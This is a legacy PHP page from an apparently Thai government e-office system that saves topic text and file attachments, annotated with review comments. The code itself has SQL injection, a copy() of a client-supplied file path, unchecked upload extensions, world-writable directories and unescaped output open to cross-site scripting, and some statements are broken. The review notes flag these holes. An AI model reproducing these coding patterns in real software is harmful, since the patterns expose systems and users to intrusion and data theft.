Current File : /var/www/html/pathumthani_eoffice/application/gov_news/bk/Copy of showcat.php
<?
// Open the session and switch on output buffering before anything else runs.
session_start();
ob_start();

// Project-wide configuration and shared helper functions.
include '../../config/config.inc.php';
include '../../common/function.php';

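/**
 * Build a string of $numchar random lowercase ASCII letters (a-z).
 *
 * Used below to make the stored name of an uploaded file unique-ish.
 * NOTE(review): rand() is not a cryptographic generator, so the result must
 * not be relied on to keep a file name unguessable.
 *
 * @param int $numchar Number of letters to generate; 0 or less yields "".
 * @return string The generated letters.
 */
function  randigit($numchar){
	$frchar = array("a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z") ;
	// The array is indexed 0..25 and rand() bounds are inclusive. The previous
	// rand(1,26) could never pick "a" and hit a missing index 26, which
	// silently produced a string shorter than requested.
	$last_index = count($frchar) - 1 ;
	$ran_digit = "";
	for ($ii = 0 ; $ii < $numchar ; $ii++ ){
		$ran_digit .= $frchar[rand(0, $last_index)] ;
	}
	return $ran_digit ;
} ## END function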

// Page controller: loads the kpi_detail rows for the current category and, on
// POST, saves the submitted topic plus any attached files, then redirects.
//
// NOTE(review): $cat_id, $title, $detail and $sub_id are never assigned in the
// visible code; presumably they come from register_globals or from the included
// config/function files. Confirm where they are set and whether they are
// escaped there.
// NOTE(review): every query below is built by interpolating those values (and
// $_POST data) straight into the SQL text. Unless they are escaped upstream this
// is SQL injection; with this mysql_* API each value needs
// mysql_real_escape_string() or an integer cast before it reaches the string.

// query for intializing...
$sql1 = "SELECT * FROM kpi_detail WHERE id='$cat_id'";
// NOTE(review): die(mysql_error()) sends the raw database error to the client.
$query1 = mysql_query($sql1) or die(mysql_error());
$nrows = mysql_num_rows($query1);
if ($_POST) {
	// NOTE(review): the attachment list is read from $_POST, not $_FILES. The
	// forms on this page declare no enctype="multipart/form-data", so a file
	// input would post only a name string here.
	$file1 = $_POST['subject_source'];
	// Default action: insert a new topic row.
	$sql = "INSERT INTO kpi_detail(id,title,detail) VALUES ('$cat_id','$title','$detail')";
	// Name of the per-row editor field ("detail" followed by the sub id).
	$sdetail ="detail".$sub_id;
	// When rows already exist and a sub id was given, update that row instead.
	if ($nrows) { if ($sub_id) { $sql = "UPDATE kpi_detail SET title='$title',detail='".$_POST[$sdetail]."' WHERE id='$cat_id' AND sub_id='$sub_id'"; } }
	
	// count for file upload
	for($i=0;$i<count($file1);$i++){	
	if (!empty($file1[$i])){ 
		#----------------------------------------------------------------------------------- find file extension 
		$today = date("ymd");
		// NOTE(review): $file1_name is not assigned in the visible code. The
		// extension is whatever follows the last "." of that name and is not
		// checked against an allow-list, so a script extension would be kept
		// for the stored file. Confirm that the upload directory cannot
		// execute scripts, and restrict the accepted extensions.
		$arrfileext = explode("." , $file1_name[$i]) ; 
		$nmcount = count($arrfileext) - 1 ; 
		$file1ext = $arrfileext[$nmcount]  ;
		// Stored name: yymmdd + 5 random letters + original extension.
		$server_filename = $today.randigit(5).".$file1ext" ;
		$save_path =  "../../upload/govnews/". $server_filename   ; 
		$save_dir =  "../../upload/govnews/"; 	
		// Rmkdir() is not defined in the visible code (presumably in common/function.php).
		if (!( is_dir($save_dir) )){ Rmkdir($save_dir);  }  ######## create the folder (original note: "per national ID card") if it does not exist yet
		// NOTE(review): the source path handed to copy() is the client-supplied
		// value from $_POST, so the server copies whatever local path the
		// request names into the upload directory. An upload should be taken
		// from $_FILES, checked with is_uploaded_file() and stored with
		// move_uploaded_file().
		if (copy( $file1[$i] , $save_path )){
			// NOTE(review): 0777 makes the directory world-writable; $path is not set in the visible code.
			if(PHP_OS=='Linux'){  chmod("$path/".$save_dir, 0777);  }
			// Unfinished statement: $s is assigned an incomplete query and never used.
			if (!$sub_id) {
				$s = "SELECT * FROM ";
			}
			// NOTE(review): $num_ch, $unlink_filename, $eserviceid, $key_doc and
			// $img_type are not assigned in the visible code.
			if($num_ch > 0){// case: a supporting document already exists
			@unlink($unlink_filename);// delete the old file before updating
				$sqlins = " UPDATE e_attach_file SET file_req='$server_filename'  WHERE ref_id='$eserviceid' AND ed_id='$key_doc[$i]'" ; 	
			}else{
			// NOTE(review): three columns are listed but four values are supplied,
			// so MySQL should reject this statement with a column-count error.
			$sqlins = " INSERT INTO  kpi_detail_file  ( `id`,`filename`,`detail`) VALUES ('$cat_id','$server_filename','$img_type','$key_doc[$i]')  " ; 			
			}
			#echo $sqlins;
			// $dbname is not assigned in the visible code (presumably set by the config include).
			 $result = mysql_db_query($dbname , $sqlins) ;
			// NOTE(review): the raw MySQL error text is echoed into the page.
			if (mysql_errno() != 0){ echo "<hr> Line".__LINE__. "   ข้อความระบบ :: ".mysql_error()  ."<br><br> "; } 
		/*		echo "  <script language=\"JavaScript\">  alert(\"   บันทึกเสร็จสิ้น   \") ; </script> ";*/
		}else{
			// Copy failed: print an error page fragment with a "back" link.
			// NOTE(review): $file1 is an array here, yet it is passed to
			// filesize() and interpolated as a string; the request-derived
			// values are printed without HTML escaping.
			print "<br><br><center> " . filesize($file1)  . "ไม่สามารถอัฟโหลดไฟล์ได้ เนื่องจากไม่มีการเลือกไฟล์  <br><br>";
			print "";
			print "<center> <a href='#' onclick='history.go(-1)'>ย้อนกลับ</a> <center><HR>";
			print("Local File: $file1 <BR>\n");
			print("Name: $file1_name <BR>\n");
			print("Size: $file1_size <BR>\n");
			print("Type: $file1_type <BR>\n");
			print("<HR>");
		}
			
	}  ######## if ($file1[$i] != ""){ 
}// end for($i=0;$i<count($file1);$i++){	
	// Run the topic INSERT/UPDATE chosen above, then redirect back to this page.
	$query = mysql_query($sql) or die(mysql_error());
	// NOTE(review): $PHP_SELF and $cat_id go into the Location header unvalidated,
	// and there is no exit after header(), so the rest of the page still runs.
	header("Location: $PHP_SELF?cat_id=$cat_id");
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>พรบ. ข้อมูลข่าวสาร</title>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="../../common/style.css" type="text/css" rel="stylesheet">
<style type="text/css">
<!--
body {
	margin-left: 4px;
	margin-top: 0px;
	margin-right: 0px;
	margin-bottom: 0px;
}
-->
</style>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="../../common/fckeditor/fckeditor.js"></script>
<script type="text/javascript">
/**
 * Reveal the hidden "new topic" form and flip the visibility of the
 * "add new topic" link table.
 */
function funcClone() {
	var newTopicForm = $("#newNode");
	newTopicForm.slideDown();

	var addTopicLink = $("#clickTable");
	addTopicLink.toggle();
}
</script>
<script type="text/javascript"><!--
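// Running counter that gives every dynamically added attachment row its own id.
var gFiles = 0;

/**
 * Append one more attachment row (file input + description input + remove
 * icon) to the element with id "files-root".
 *
 * The two unused label variables of the earlier version were dropped.
 * NOTE(review): "files-root" is emitted once per edit form on this page, so
 * with several forms getElementById() resolves to only one of them; presumably
 * the first. The forms also declare no enctype="multipart/form-data", which a
 * file input needs for its content to be submitted.
 */
function addFile() {
	var rowId = 'file-' + gFiles;
	var li = document.createElement('li');
	li.setAttribute('id', rowId);
	// The markup embeds only the numeric counter, never user-supplied text.
	li.innerHTML = 'ชื่อไฟล์ : <input type="file" name="subject_source[]" size="30"><br/>รายละเอียด : <input type="text" name="subject_text[]" size="27"><span onclick="removeFile(\'' + rowId + '\')" style="cursor:pointer;"> <img src=../../images/profile_expanded.gif border=0></span>';
	document.getElementById('files-root').appendChild(li);
	gFiles++;
}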

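/**
 * Remove the attachment row with the given element id from the page.
 *
 * @param {string} aId  id of the row to remove, e.g. "file-0" as set by addFile()
 */
function removeFile(aId){
	var row = document.getElementById(aId);
	// The row may already be gone (or the id may be unknown); the earlier
	// version threw a TypeError on the null lookup in that case.
	if (!row || !row.parentNode) {
		return;
	}
	row.parentNode.removeChild(row);
}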
-->
</script>
</head>

<body bgcolor="#A3B2CC">
<? /* Edit forms: when kpi_detail rows exist, one form is rendered per row,
      followed by the "add new topic" link and a hidden wrapper for the
      new-topic form; with no rows the wrapper is emitted visible instead.

      NOTE(review): every value below is echoed without encoding for its
      context. $rs[title] lands in an HTML attribute, $PHP_SELF / $cat_id /
      $rs[sub_id] in the form name and action, and $rs[detail] inside a
      single-quoted JavaScript string with only CR and LF stripped. Stored or
      request-supplied markup or quotes would therefore break out of those
      contexts (cross-site scripting). HTML contexts need htmlspecialchars();
      the JavaScript string needs an encoder made for JS string literals.
      NOTE(review): $rs[sub_id], $rs[title] and $rs[detail] use unquoted
      array keys, and eregi_replace() is gone from current PHP releases.
      NOTE(review): id="title" and id="files-root" repeat for every row, so
      the ids are not unique on the page. $action is not assigned in the
      visible code.
   */
if($nrows) { while($rs = mysql_fetch_assoc($query1)) { /* start while */ ?>
<br>
<form name="form<?=$cat_id;?><?=$rs[sub_id];?>" method="post" action="<?=$PHP_SELF;?>?cat_id=<?=$cat_id;?>&sub_id=<?=$rs[sub_id];?>">
  <table width="95%" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#000000">
    <tr>
      <td><table width="100%" border="0" align="center" cellpadding="2" cellspacing="1">
          <tr>
            <th colspan="2" align="left" bgcolor="#AEBCD2">รายละเอียด</th>
          </tr>
          <tr>
            <td width="20%" align="right" valign="top" bgcolor="#F3F5F8">หัวข้อ : </td>
            <td width="80%" align="center" valign="top" bgcolor="#F3F5F8">
				<input name="title" type="text" id="title" style="width:98%;" value="<?=$rs[title];?>">			</td>
          </tr>
          <tr>
            <td align="right" valign="top" bgcolor="#F3F5F8">รายละเอียด : </td>
            <td valign="top" bgcolor="#F3F5F8">
				<script type="text/javascript">
					var sBasePath = '../../common/fckeditor/';
					var oFCKeditor<?=$rs[sub_id];?> = new FCKeditor( 'detail<?=$rs[sub_id];?>' ) ;
					oFCKeditor<?=$rs[sub_id];?>.BasePath	= sBasePath ;
					oFCKeditor<?=$rs[sub_id];?>.ToolbarSet = 'Basic' ;
					oFCKeditor<?=$rs[sub_id];?>.Value = '<?=eregi_replace("\n","",eregi_replace(chr(13),"",$rs[detail]));?>' ;
					oFCKeditor<?=$rs[sub_id];?>.Create();
				</script>			 </td>
          </tr>
          <tr>
            <td align="right" valign="top" bgcolor="#F3F5F8">แนบไฟล์ :  </td>
            <td align="left" valign="top" bgcolor="#F3F5F8">
			<span style="cursor:pointer;" onClick="addFile()">เพิ่มไฟล์ <img src="../../images/profile_collapsed.gif" border="0"></span>
	<ul id="files-root">
	 <? if(($action != "edit")){ ?>
		<li>ชื่อไฟล์ : <input type="file" name="subject_source[]" size="30"><br/>รายละเอียด : <input type="text" name="subject_text[]" size="27"></li>
	  <? } ?>
	  <?
/*  if(($action == "edit")){
	$strSQL_e = "SELECT * FROM sml_budget  WHERE epm_id='$epm_id' and type_budget='5' ";
	$Result_e = mysql_query($strSQL_e);
	$nn=0;
	while($Rse = mysql_fetch_assoc($Result_e)){
			echo "<li id='file-".$nn."'>
<input type=\"text\" name=\"subject_sEdit[$nn]\" size=\"50\" value='$Rse[text_budget]'>&nbsp;&nbsp;&nbsp;จำนวนเงิน<input name=\"budget_sEdit[]\" type=\"text\" size=\"10\" value='$Rse[budget_list]'> <span onclick=\"removeFile('file-".$nn."')\" style=\"cursor:hand;\"><img src=../images/profile_expanded.gif border=0></span><br>";
		echo "<input type='hidden' name='runid_e[$nn]' value='$Rse[runid]'></li>";
		$nn++;
		}
	}*/
	  ?>  
	</ul>			</td>
          </tr>
          <tr>
            <td colspan="2" align="center" valign="top" bgcolor="#F3F5F8"><input name="Submit2" type="submit" class="epm_button" value="จัดเก็บข้อมูล"></td>
          </tr>
      </table></td>
    </tr>
  </table>
</form>
<br/>
<? } ?>
<table width="100%" border="0" id="clickTable">
  <tr>
    <td height="18" align="left" valign="middle"><a href="javascript:;" onClick="return funcClone();"><img src="../../images_sys/nolines_plus.gif" alt="+" width="18" height="18" border="0" align="middle">เพิ่มหัวข้อใหม่</a></td>
  </tr>
</table>
<div id="newNode" style="display:none;">
<? } else { ?><div id="newNode"><? } ?>
<form name="formx" method="post" action="<?=$PHP_SELF;?>?cat_id=<?=$cat_id;?>">
  <table width="95%" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#000000">
    <tr>
      <td><table width="100%" border="0" align="center" cellpadding="2" cellspacing="1">
          <tr>
            <th colspan="2" align="left" bgcolor="#AEBCD2">รายละเอียด</th>
          </tr>
          <tr>
            <td width="20%" align="right" valign="top" bgcolor="#F3F5F8">หัวข้อ : </td>
            <td width="80%" align="center" valign="top" bgcolor="#F3F5F8">
				<input name="title" type="text" id="title" style="width:98%;" value="">			</td>
          </tr>
          <tr>
            <td align="right" valign="top" bgcolor="#F3F5F8">รายละเอียด : </td>
            <td valign="top" bgcolor="#F3F5F8">
				<script type="text/javascript">
					var sBasePath = '../../common/fckeditor/';
					var oFCKeditor = new FCKeditor( 'detail' ) ;
					oFCKeditor.BasePath	= sBasePath ;
					oFCKeditor.ToolbarSet = 'Basic' ;
					oFCKeditor.Value = '' ;
					oFCKeditor.Create() ;
				</script>		    </td>
          </tr>
          <tr>
            <td align="right" valign="top" bgcolor="#F3F5F8">แนบไฟล์ :  </td>
            <td align="left" valign="top" bgcolor="#F3F5F8"><input type="file" name="filename"></td>
          </tr>
          <tr>
            <td colspan="2" align="center" valign="top" bgcolor="#F3F5F8"><input name="Submit" type="submit" class="epm_button" value="จัดเก็บข้อมูล"></td>
          </tr>
      </table></td>
    </tr>
  </table>
</form>
<br/>
</div>
</body>

</html>
